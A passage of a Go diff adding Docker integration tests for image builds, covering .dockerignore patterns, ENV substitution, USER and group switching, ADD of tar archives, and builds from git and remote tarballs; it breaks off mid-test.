TestBuildDockerignoringWholeDir(c *check.C) { + name := "testbuilddockerignorewholedir" + dockerfile := ` + FROM busybox + COPY . / + RUN sh -c "[[ ! 
-e /.gitignore ]]" + RUN sh -c "[[ -f /Makefile ]]"` + ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": "FROM scratch", + "Makefile": "all:", + ".gitignore": "", + ".dockerignore": ".*\n", + }) + c.Assert(err, check.IsNil) + defer ctx.Close() + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + + c.Assert(ctx.Add(".dockerfile", "*"), check.IsNil) + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + + c.Assert(ctx.Add(".dockerfile", "."), check.IsNil) + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + + c.Assert(ctx.Add(".dockerfile", "?"), check.IsNil) + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildDockerignoringBadExclusion(c *check.C) { + name := "testbuilddockerignorebadexclusion" + dockerfile := ` + FROM busybox + COPY . / + RUN sh -c "[[ ! -e /.gitignore ]]" + RUN sh -c "[[ -f /Makefile ]]"` + ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": "FROM scratch", + "Makefile": "all:", + ".gitignore": "", + ".dockerignore": "!\n", + }) + c.Assert(err, check.IsNil) + defer ctx.Close() + if _, err = buildImageFromContext(name, ctx, true); err == nil { + c.Fatalf("Build was supposed to fail but didn't") + } + + if err.Error() != "failed to build the image: Error checking context: 'Illegal exclusion pattern: !'.\n" { + c.Fatalf("Incorrect output, got:%q", err.Error()) + } +} + +func (s *DockerSuite) TestBuildDockerignoringWildTopDir(c *check.C) { + dockerfile := ` + FROM busybox + COPY . / + RUN sh -c "[[ ! -e /.dockerignore ]]" + RUN sh -c "[[ ! -e /Dockerfile ]]" + RUN sh -c "[[ ! -e /file1 ]]" + RUN sh -c "[[ ! 
-e /dir ]]"` + + ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": "FROM scratch", + "file1": "", + "dir/dfile1": "", + }) + c.Assert(err, check.IsNil) + defer ctx.Close() + + // All of these should result in ignoring all files + for _, variant := range []string{"**", "**/", "**/**", "*"} { + ctx.Add(".dockerignore", variant) + _, err = buildImageFromContext("noname", ctx, true) + c.Assert(err, check.IsNil, check.Commentf("variant: %s", variant)) + } +} + +func (s *DockerSuite) TestBuildDockerignoringWildDirs(c *check.C) { + dockerfile := ` + FROM busybox + COPY . / + #RUN sh -c "[[ -e /.dockerignore ]]" + RUN sh -c "[[ -e /Dockerfile ]] && \ + [[ ! -e /file0 ]] && \ + [[ ! -e /dir1/file0 ]] && \ + [[ ! -e /dir2/file0 ]] && \ + [[ ! -e /file1 ]] && \ + [[ ! -e /dir1/file1 ]] && \ + [[ ! -e /dir1/dir2/file1 ]] && \ + [[ ! -e /dir1/file2 ]] && \ + [[ -e /dir1/dir2/file2 ]] && \ + [[ ! -e /dir1/dir2/file4 ]] && \ + [[ ! -e /dir1/dir2/file5 ]] && \ + [[ ! -e /dir1/dir2/file6 ]] && \ + [[ ! -e /dir1/dir3/file7 ]] && \ + [[ ! -e /dir1/dir3/file8 ]] && \ + [[ -e /dir1/dir3 ]] && \ + [[ -e /dir1/dir4 ]] && \ + [[ ! -e 'dir1/dir5/fileAA' ]] && \ + [[ -e 'dir1/dir5/fileAB' ]] && \ + [[ -e 'dir1/dir5/fileB' ]]" # "." in pattern means nothing + + RUN echo all done!` + + ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": "FROM scratch", + "file0": "", + "dir1/file0": "", + "dir1/dir2/file0": "", + + "file1": "", + "dir1/file1": "", + "dir1/dir2/file1": "", + + "dir1/file2": "", + "dir1/dir2/file2": "", // remains + + "dir1/dir2/file4": "", + "dir1/dir2/file5": "", + "dir1/dir2/file6": "", + "dir1/dir3/file7": "", + "dir1/dir3/file8": "", + "dir1/dir4/file9": "", + + "dir1/dir5/fileAA": "", + "dir1/dir5/fileAB": "", + "dir1/dir5/fileB": "", + + ".dockerignore": ` +**/file0 +**/*file1 +**/dir1/file2 +dir1/**/file4 +**/dir2/file5 +**/dir1/dir2/file6 +dir1/dir3/** +**/dir4/** +**/file?A +**/file\?B +**/dir5/file. 
+`, + }) + c.Assert(err, check.IsNil) + defer ctx.Close() + + _, err = buildImageFromContext("noname", ctx, true) + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestBuildLineBreak(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildlinebreak" + _, err := buildImage(name, + `FROM busybox +RUN sh -c 'echo root:testpass \ + > /tmp/passwd' +RUN mkdir -p /var/run/sshd +RUN sh -c "[ "$(cat /tmp/passwd)" = "root:testpass" ]" +RUN sh -c "[ "$(ls -d /var/run/sshd)" = "/var/run/sshd" ]"`, + true) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildEOLInLine(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildeolinline" + _, err := buildImage(name, + `FROM busybox +RUN sh -c 'echo root:testpass > /tmp/passwd' +RUN echo "foo \n bar"; echo "baz" +RUN mkdir -p /var/run/sshd +RUN sh -c "[ "$(cat /tmp/passwd)" = "root:testpass" ]" +RUN sh -c "[ "$(ls -d /var/run/sshd)" = "/var/run/sshd" ]"`, + true) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildCommentsShebangs(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildcomments" + _, err := buildImage(name, + `FROM busybox +# This is an ordinary comment. +RUN { echo '#!/bin/sh'; echo 'echo hello world'; } > /hello.sh +RUN [ ! 
-x /hello.sh ] +# comment with line break \ +RUN chmod +x /hello.sh +RUN [ -x /hello.sh ] +RUN [ "$(cat /hello.sh)" = $'#!/bin/sh\necho hello world' ] +RUN [ "$(/hello.sh)" = "hello world" ]`, + true) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildUsersAndGroups(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildusers" + _, err := buildImage(name, + `FROM busybox + +# Make sure our defaults work +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)" = '0:0/root:root' ] + +# TODO decide if "args.user = strconv.Itoa(syscall.Getuid())" is acceptable behavior for changeUser in sysvinit instead of "return nil" when "USER" isn't specified (so that we get the proper group list even if that is the empty list, even in the default case of not supplying an explicit USER to run as, which implies USER 0) +USER root +RUN [ "$(id -G):$(id -Gn)" = '0 10:root wheel' ] + +# Setup dockerio user and group +RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd && \ + echo 'dockerio:x:1001:' >> /etc/group + +# Make sure we can switch to our user and all the information is exactly as we expect it to be +USER dockerio +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001:dockerio' ] + +# Switch back to root and double check that worked exactly as we might expect it to +USER root +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '0:0/root:root/0 10:root wheel' ] && \ + # Add a "supplementary" group for our dockerio user + echo 'supplementary:x:1002:dockerio' >> /etc/group + +# ... 
and then go verify that we get it like we expect +USER dockerio +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001 1002:dockerio supplementary' ] +USER 1001 +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001 1002:dockerio supplementary' ] + +# super test the new "user:group" syntax +USER dockerio:dockerio +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001:dockerio' ] +USER 1001:dockerio +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001:dockerio' ] +USER dockerio:1001 +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001:dockerio' ] +USER 1001:1001 +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1001/dockerio:dockerio/1001:dockerio' ] +USER dockerio:supplementary +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1002/dockerio:supplementary/1002:supplementary' ] +USER dockerio:1002 +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1002/dockerio:supplementary/1002:supplementary' ] +USER 1001:supplementary +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1002/dockerio:supplementary/1002:supplementary' ] +USER 1001:1002 +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1001:1002/dockerio:supplementary/1002:supplementary' ] + +# make sure unknown uid/gid still works properly +USER 1042:1043 +RUN [ "$(id -u):$(id -g)/$(id -un):$(id -gn)/$(id -G):$(id -Gn)" = '1042:1043/1042:1043/1043:1043' ]`, + true) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildEnvUsage(c *check.C) { + // /docker/world/hello is not owned by the correct user + testRequires(c, NotUserNamespace) + testRequires(c, DaemonIsLinux) + name := "testbuildenvusage" + dockerfile := `FROM busybox +ENV HOME /root +ENV PATH 
$HOME/bin:$PATH +ENV PATH /tmp:$PATH +RUN [ "$PATH" = "/tmp:$HOME/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" ] +ENV FOO /foo/baz +ENV BAR /bar +ENV BAZ $BAR +ENV FOOPATH $PATH:$FOO +RUN [ "$BAR" = "$BAZ" ] +RUN [ "$FOOPATH" = "$PATH:/foo/baz" ] +ENV FROM hello/docker/world +ENV TO /docker/world/hello +ADD $FROM $TO +RUN [ "$(cat $TO)" = "hello" ] +ENV abc=def +ENV ghi=$abc +RUN [ "$ghi" = "def" ] +` + ctx, err := fakeContext(dockerfile, map[string]string{ + "hello/docker/world": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + _, err = buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildEnvUsage2(c *check.C) { + // /docker/world/hello is not owned by the correct user + testRequires(c, NotUserNamespace) + testRequires(c, DaemonIsLinux) + name := "testbuildenvusage2" + dockerfile := `FROM busybox +ENV abc=def def="hello world" +RUN [ "$abc,$def" = "def,hello world" ] +ENV def=hello\ world v1=abc v2="hi there" v3='boogie nights' v4="with'quotes too" +RUN [ "$def,$v1,$v2,$v3,$v4" = "hello world,abc,hi there,boogie nights,with'quotes too" ] +ENV abc=zzz FROM=hello/docker/world +ENV abc=zzz TO=/docker/world/hello +ADD $FROM $TO +RUN [ "$abc,$(cat $TO)" = "zzz,hello" ] +ENV abc 'yyy' +RUN [ $abc = 'yyy' ] +ENV abc= +RUN [ "$abc" = "" ] + +# use grep to make sure if the builder substitutes \$foo by mistake +# we don't get a false positive +ENV abc=\$foo +RUN [ "$abc" = "\$foo" ] && (echo "$abc" | grep foo) +ENV abc \$foo +RUN [ "$abc" = "\$foo" ] && (echo "$abc" | grep foo) + +ENV abc=\'foo\' abc2=\"foo\" +RUN [ "$abc,$abc2" = "'foo',\"foo\"" ] +ENV abc "foo" +RUN [ "$abc" = "foo" ] +ENV abc 'foo' +RUN [ "$abc" = 'foo' ] +ENV abc \'foo\' +RUN [ "$abc" = "'foo'" ] +ENV abc \"foo\" +RUN [ "$abc" = '"foo"' ] + +ENV abc=ABC +RUN [ "$abc" = "ABC" ] +ENV def1=${abc:-DEF} def2=${ccc:-DEF} +ENV def3=${ccc:-${def2}xx} def4=${abc:+ALT} def5=${def2:+${abc}:} 
def6=${ccc:-\$abc:} def7=${ccc:-\${abc}:} +RUN [ "$def1,$def2,$def3,$def4,$def5,$def6,$def7" = 'ABC,DEF,DEFxx,ALT,ABC:,$abc:,${abc:}' ] +ENV mypath=${mypath:+$mypath:}/home +ENV mypath=${mypath:+$mypath:}/away +RUN [ "$mypath" = '/home:/away' ] + +ENV e1=bar +ENV e2=$e1 e3=$e11 e4=\$e1 e5=\$e11 +RUN [ "$e0,$e1,$e2,$e3,$e4,$e5" = ',bar,bar,,$e1,$e11' ] + +ENV ee1 bar +ENV ee2 $ee1 +ENV ee3 $ee11 +ENV ee4 \$ee1 +ENV ee5 \$ee11 +RUN [ "$ee1,$ee2,$ee3,$ee4,$ee5" = 'bar,bar,,$ee1,$ee11' ] + +ENV eee1="foo" eee2='foo' +ENV eee3 "foo" +ENV eee4 'foo' +RUN [ "$eee1,$eee2,$eee3,$eee4" = 'foo,foo,foo,foo' ] + +` + ctx, err := fakeContext(dockerfile, map[string]string{ + "hello/docker/world": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + _, err = buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildAddScript(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildaddscript" + dockerfile := ` +FROM busybox +ADD test /test +RUN ["chmod","+x","/test"] +RUN ["/test"] +RUN [ "$(cat /testfile)" = 'test!' ]` + ctx, err := fakeContext(dockerfile, map[string]string{ + "test": "#!/bin/sh\necho 'test!' 
> /testfile", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + _, err = buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildAddTar(c *check.C) { + // /test/foo is not owned by the correct user + testRequires(c, NotUserNamespace) + name := "testbuildaddtar" + + ctx := func() *FakeContext { + dockerfile := ` +FROM busybox +ADD test.tar / +RUN cat /test/foo | grep Hi +ADD test.tar /test.tar +RUN cat /test.tar/test/foo | grep Hi +ADD test.tar /unlikely-to-exist +RUN cat /unlikely-to-exist/test/foo | grep Hi +ADD test.tar /unlikely-to-exist-trailing-slash/ +RUN cat /unlikely-to-exist-trailing-slash/test/foo | grep Hi +RUN sh -c "mkdir /existing-directory" #sh -c is needed on Windows to use the correct mkdir +ADD test.tar /existing-directory +RUN cat /existing-directory/test/foo | grep Hi +ADD test.tar /existing-directory-trailing-slash/ +RUN cat /existing-directory-trailing-slash/test/foo | grep Hi` + tmpDir, err := ioutil.TempDir("", "fake-context") + c.Assert(err, check.IsNil) + testTar, err := os.Create(filepath.Join(tmpDir, "test.tar")) + if err != nil { + c.Fatalf("failed to create test.tar archive: %v", err) + } + defer testTar.Close() + + tw := tar.NewWriter(testTar) + + if err := tw.WriteHeader(&tar.Header{ + Name: "test/foo", + Size: 2, + }); err != nil { + c.Fatalf("failed to write tar file header: %v", err) + } + if _, err := tw.Write([]byte("Hi")); err != nil { + c.Fatalf("failed to write tar file content: %v", err) + } + if err := tw.Close(); err != nil { + c.Fatalf("failed to close tar archive: %v", err) + } + + if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { + c.Fatalf("failed to open destination dockerfile: %v", err) + } + return fakeContextFromDir(tmpDir) + }() + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("build failed to complete for TestBuildAddTar: %v", err) + } + 
+} + +func (s *DockerSuite) TestBuildAddBrokenTar(c *check.C) { + name := "testbuildaddbrokentar" + + ctx := func() *FakeContext { + dockerfile := ` +FROM busybox +ADD test.tar /` + tmpDir, err := ioutil.TempDir("", "fake-context") + c.Assert(err, check.IsNil) + testTar, err := os.Create(filepath.Join(tmpDir, "test.tar")) + if err != nil { + c.Fatalf("failed to create test.tar archive: %v", err) + } + defer testTar.Close() + + tw := tar.NewWriter(testTar) + + if err := tw.WriteHeader(&tar.Header{ + Name: "test/foo", + Size: 2, + }); err != nil { + c.Fatalf("failed to write tar file header: %v", err) + } + if _, err := tw.Write([]byte("Hi")); err != nil { + c.Fatalf("failed to write tar file content: %v", err) + } + if err := tw.Close(); err != nil { + c.Fatalf("failed to close tar archive: %v", err) + } + + // Corrupt the tar by removing one byte off the end + stat, err := testTar.Stat() + if err != nil { + c.Fatalf("failed to stat tar archive: %v", err) + } + if err := testTar.Truncate(stat.Size() - 1); err != nil { + c.Fatalf("failed to truncate tar archive: %v", err) + } + + if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { + c.Fatalf("failed to open destination dockerfile: %v", err) + } + return fakeContextFromDir(tmpDir) + }() + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err == nil { + c.Fatalf("build should have failed for TestBuildAddBrokenTar") + } +} + +func (s *DockerSuite) TestBuildAddNonTar(c *check.C) { + name := "testbuildaddnontar" + + // Should not try to extract test.tar + ctx, err := fakeContext(` + FROM busybox + ADD test.tar / + RUN test -f /test.tar`, + map[string]string{"test.tar": "not_a_tar_file"}) + + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("build failed for TestBuildAddNonTar") + } +} + +func (s *DockerSuite) TestBuildAddTarXz(c *check.C) { + // /test/foo is 
not owned by the correct user + testRequires(c, NotUserNamespace) + testRequires(c, DaemonIsLinux) + name := "testbuildaddtarxz" + + ctx := func() *FakeContext { + dockerfile := ` + FROM busybox + ADD test.tar.xz / + RUN cat /test/foo | grep Hi` + tmpDir, err := ioutil.TempDir("", "fake-context") + c.Assert(err, check.IsNil) + testTar, err := os.Create(filepath.Join(tmpDir, "test.tar")) + if err != nil { + c.Fatalf("failed to create test.tar archive: %v", err) + } + defer testTar.Close() + + tw := tar.NewWriter(testTar) + + if err := tw.WriteHeader(&tar.Header{ + Name: "test/foo", + Size: 2, + }); err != nil { + c.Fatalf("failed to write tar file header: %v", err) + } + if _, err := tw.Write([]byte("Hi")); err != nil { + c.Fatalf("failed to write tar file content: %v", err) + } + if err := tw.Close(); err != nil { + c.Fatalf("failed to close tar archive: %v", err) + } + + xzCompressCmd := exec.Command("xz", "-k", "test.tar") + xzCompressCmd.Dir = tmpDir + out, _, err := runCommandWithOutput(xzCompressCmd) + if err != nil { + c.Fatal(err, out) + } + + if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { + c.Fatalf("failed to open destination dockerfile: %v", err) + } + return fakeContextFromDir(tmpDir) + }() + + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("build failed to complete for TestBuildAddTarXz: %v", err) + } + +} + +func (s *DockerSuite) TestBuildAddTarXzGz(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildaddtarxzgz" + + ctx := func() *FakeContext { + dockerfile := ` + FROM busybox + ADD test.tar.xz.gz / + RUN ls /test.tar.xz.gz` + tmpDir, err := ioutil.TempDir("", "fake-context") + c.Assert(err, check.IsNil) + testTar, err := os.Create(filepath.Join(tmpDir, "test.tar")) + if err != nil { + c.Fatalf("failed to create test.tar archive: %v", err) + } + defer testTar.Close() + + tw := tar.NewWriter(testTar) + + if err := 
tw.WriteHeader(&tar.Header{ + Name: "test/foo", + Size: 2, + }); err != nil { + c.Fatalf("failed to write tar file header: %v", err) + } + if _, err := tw.Write([]byte("Hi")); err != nil { + c.Fatalf("failed to write tar file content: %v", err) + } + if err := tw.Close(); err != nil { + c.Fatalf("failed to close tar archive: %v", err) + } + + xzCompressCmd := exec.Command("xz", "-k", "test.tar") + xzCompressCmd.Dir = tmpDir + out, _, err := runCommandWithOutput(xzCompressCmd) + if err != nil { + c.Fatal(err, out) + } + + gzipCompressCmd := exec.Command("gzip", "test.tar.xz") + gzipCompressCmd.Dir = tmpDir + out, _, err = runCommandWithOutput(gzipCompressCmd) + if err != nil { + c.Fatal(err, out) + } + + if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { + c.Fatalf("failed to open destination dockerfile: %v", err) + } + return fakeContextFromDir(tmpDir) + }() + + defer ctx.Close() + + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("build failed to complete for TestBuildAddTarXz: %v", err) + } + +} + +func (s *DockerSuite) TestBuildFromGit(c *check.C) { + name := "testbuildfromgit" + git, err := newFakeGit("repo", map[string]string{ + "Dockerfile": `FROM busybox + ADD first /first + RUN [ -f /first ] + MAINTAINER docker`, + "first": "test git data", + }, true) + if err != nil { + c.Fatal(err) + } + defer git.Close() + + _, err = buildImageFromPath(name, git.RepoURL, true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Author") + if res != "docker" { + c.Fatalf("Maintainer should be docker, got %s", res) + } +} + +func (s *DockerSuite) TestBuildFromGitWithContext(c *check.C) { + name := "testbuildfromgit" + git, err := newFakeGit("repo", map[string]string{ + "docker/Dockerfile": `FROM busybox + ADD first /first + RUN [ -f /first ] + MAINTAINER docker`, + "docker/first": "test git data", + }, true) + if err != nil { + c.Fatal(err) + } + defer git.Close() + + u := 
fmt.Sprintf("%s#master:docker", git.RepoURL) + _, err = buildImageFromPath(name, u, true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Author") + if res != "docker" { + c.Fatalf("Maintainer should be docker, got %s", res) + } +} + +func (s *DockerSuite) TestBuildFromGitwithF(c *check.C) { + name := "testbuildfromgitwithf" + git, err := newFakeGit("repo", map[string]string{ + "myApp/myDockerfile": `FROM busybox + RUN echo hi from Dockerfile`, + }, true) + if err != nil { + c.Fatal(err) + } + defer git.Close() + + out, _, err := dockerCmdWithError("build", "-t", name, "--no-cache", "-f", "myApp/myDockerfile", git.RepoURL) + if err != nil { + c.Fatalf("Error on build. Out: %s\nErr: %v", out, err) + } + + if !strings.Contains(out, "hi from Dockerfile") { + c.Fatalf("Missing expected output, got:\n%s", out) + } +} + +func (s *DockerSuite) TestBuildFromRemoteTarball(c *check.C) { + name := "testbuildfromremotetarball" + + buffer := new(bytes.Buffer) + tw := tar.NewWriter(buffer) + defer tw.Close() + + dockerfile := []byte(`FROM busybox + MAINTAINER docker`) + if err := tw.WriteHeader(&tar.Header{ + Name: "Dockerfile", + Size: int64(len(dockerfile)), + }); err != nil { + c.Fatalf("failed to write tar file header: %v", err) + } + if _, err := tw.Write(dockerfile); err != nil { + c.Fatalf("failed to write tar file content: %v", err) + } + if err := tw.Close(); err != nil { + c.Fatalf("failed to close tar archive: %v", err) + } + + server, err := fakeBinaryStorage(map[string]*bytes.Buffer{ + "testT.tar": buffer, + }) + c.Assert(err, check.IsNil) + + defer server.Close() + + _, err = buildImageFromPath(name, server.URL()+"/testT.tar", true) + c.Assert(err, check.IsNil) + + res := inspectField(c, name, "Author") + + if res != "docker" { + c.Fatalf("Maintainer should be docker, got %s", res) + } +} + +func (s *DockerSuite) TestBuildCleanupCmdOnEntrypoint(c *check.C) { + name := "testbuildcmdcleanuponentrypoint" + if _, err := buildImage(name, + `FROM 
`+minimalBaseImage()+` + CMD ["test"] + ENTRYPOINT ["echo"]`, + true); err != nil { + c.Fatal(err) + } + if _, err := buildImage(name, + fmt.Sprintf(`FROM %s + ENTRYPOINT ["cat"]`, name), + true); err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.Cmd") + if res != "[]" { + c.Fatalf("Cmd %s, expected nil", res) + } + + res = inspectField(c, name, "Config.Entrypoint") + if expected := "[cat]"; res != expected { + c.Fatalf("Entrypoint %s, expected %s", res, expected) + } +} + +func (s *DockerSuite) TestBuildClearCmd(c *check.C) { + name := "testbuildclearcmd" + _, err := buildImage(name, + `From `+minimalBaseImage()+` + ENTRYPOINT ["/bin/bash"] + CMD []`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectFieldJSON(c, name, "Config.Cmd") + if res != "[]" { + c.Fatalf("Cmd %s, expected %s", res, "[]") + } +} + +func (s *DockerSuite) TestBuildEmptyCmd(c *check.C) { + // Skip on Windows. Base image on Windows has a CMD set in the image. + testRequires(c, DaemonIsLinux) + + name := "testbuildemptycmd" + if _, err := buildImage(name, "FROM "+minimalBaseImage()+"\nMAINTAINER quux\n", true); err != nil { + c.Fatal(err) + } + res := inspectFieldJSON(c, name, "Config.Cmd") + if res != "null" { + c.Fatalf("Cmd %s, expected %s", res, "null") + } +} + +func (s *DockerSuite) TestBuildOnBuildOutput(c *check.C) { + name := "testbuildonbuildparent" + if _, err := buildImage(name, "FROM busybox\nONBUILD RUN echo foo\n", true); err != nil { + c.Fatal(err) + } + + _, out, err := buildImageWithOut(name, "FROM "+name+"\nMAINTAINER quux\n", true) + if err != nil { + c.Fatal(err) + } + + if !strings.Contains(out, "# Executing 1 build trigger") { + c.Fatal("failed to find the build trigger output", out) + } +} + +func (s *DockerSuite) TestBuildInvalidTag(c *check.C) { + name := "abcd:" + stringutils.GenerateRandomAlphaOnlyString(200) + _, out, err := buildImageWithOut(name, "FROM "+minimalBaseImage()+"\nMAINTAINER quux\n", true) + // if the error doesn't check 
for illegal tag name, or the image is built + // then this should fail + if !strings.Contains(out, "Error parsing reference") || strings.Contains(out, "Sending build context to Docker daemon") { + c.Fatalf("failed to stop before building. Error: %s, Output: %s", err, out) + } +} + +func (s *DockerSuite) TestBuildCmdShDashC(c *check.C) { + name := "testbuildcmdshc" + if _, err := buildImage(name, "FROM busybox\nCMD echo cmd\n", true); err != nil { + c.Fatal(err) + } + + res := inspectFieldJSON(c, name, "Config.Cmd") + + expected := `["/bin/sh","-c","echo cmd"]` + if daemonPlatform == "windows" { + expected = `["cmd","/S","/C","echo cmd"]` + } + + if res != expected { + c.Fatalf("Expected value %s not in Config.Cmd: %s", expected, res) + } + +} + +func (s *DockerSuite) TestBuildCmdSpaces(c *check.C) { + // Test to make sure that when we strcat arrays we take into account + // the arg separator to make sure ["echo","hi"] and ["echo hi"] don't + // look the same + name := "testbuildcmdspaces" + var id1 string + var id2 string + var err error + + if id1, err = buildImage(name, "FROM busybox\nCMD [\"echo hi\"]\n", true); err != nil { + c.Fatal(err) + } + + if id2, err = buildImage(name, "FROM busybox\nCMD [\"echo\", \"hi\"]\n", true); err != nil { + c.Fatal(err) + } + + if id1 == id2 { + c.Fatal("Should not have resulted in the same CMD") + } + + // Now do the same with ENTRYPOINT + if id1, err = buildImage(name, "FROM busybox\nENTRYPOINT [\"echo hi\"]\n", true); err != nil { + c.Fatal(err) + } + + if id2, err = buildImage(name, "FROM busybox\nENTRYPOINT [\"echo\", \"hi\"]\n", true); err != nil { + c.Fatal(err) + } + + if id1 == id2 { + c.Fatal("Should not have resulted in the same ENTRYPOINT") + } + +} + +func (s *DockerSuite) TestBuildCmdJSONNoShDashC(c *check.C) { + name := "testbuildcmdjson" + if _, err := buildImage(name, "FROM busybox\nCMD [\"echo\", \"cmd\"]", true); err != nil { + c.Fatal(err) + } + + res := inspectFieldJSON(c, name, "Config.Cmd") + + expected := 
`["echo","cmd"]` + + if res != expected { + c.Fatalf("Expected value %s not in Config.Cmd: %s", expected, res) + } + +} + +func (s *DockerSuite) TestBuildEntrypointInheritance(c *check.C) { + + if _, err := buildImage("parent", ` + FROM busybox + ENTRYPOINT exit 130 + `, true); err != nil { + c.Fatal(err) + } + + if _, status, _ := dockerCmdWithError("run", "parent"); status != 130 { + c.Fatalf("expected exit code 130 but received %d", status) + } + + if _, err := buildImage("child", ` + FROM parent + ENTRYPOINT exit 5 + `, true); err != nil { + c.Fatal(err) + } + + if _, status, _ := dockerCmdWithError("run", "child"); status != 5 { + c.Fatalf("expected exit code 5 but received %d", status) + } + +} + +func (s *DockerSuite) TestBuildEntrypointInheritanceInspect(c *check.C) { + var ( + name = "testbuildepinherit" + name2 = "testbuildepinherit2" + expected = `["/bin/sh","-c","echo quux"]` + ) + + if daemonPlatform == "windows" { + expected = `["cmd","/S","/C","echo quux"]` + } + + if _, err := buildImage(name, "FROM busybox\nENTRYPOINT /foo/bar", true); err != nil { + c.Fatal(err) + } + + if _, err := buildImage(name2, fmt.Sprintf("FROM %s\nENTRYPOINT echo quux", name), true); err != nil { + c.Fatal(err) + } + + res := inspectFieldJSON(c, name2, "Config.Entrypoint") + + if res != expected { + c.Fatalf("Expected value %s not in Config.Entrypoint: %s", expected, res) + } + + out, _ := dockerCmd(c, "run", name2) + + expected = "quux" + + if strings.TrimSpace(out) != expected { + c.Fatalf("Expected output is %s, got %s", expected, out) + } + +} + +func (s *DockerSuite) TestBuildRunShEntrypoint(c *check.C) { + name := "testbuildentrypoint" + _, err := buildImage(name, + `FROM busybox + ENTRYPOINT echo`, + true) + if err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", "--rm", name) +} + +func (s *DockerSuite) TestBuildExoticShellInterpolation(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildexoticshellinterpolation" + + _, err := buildImage(name, ` + 
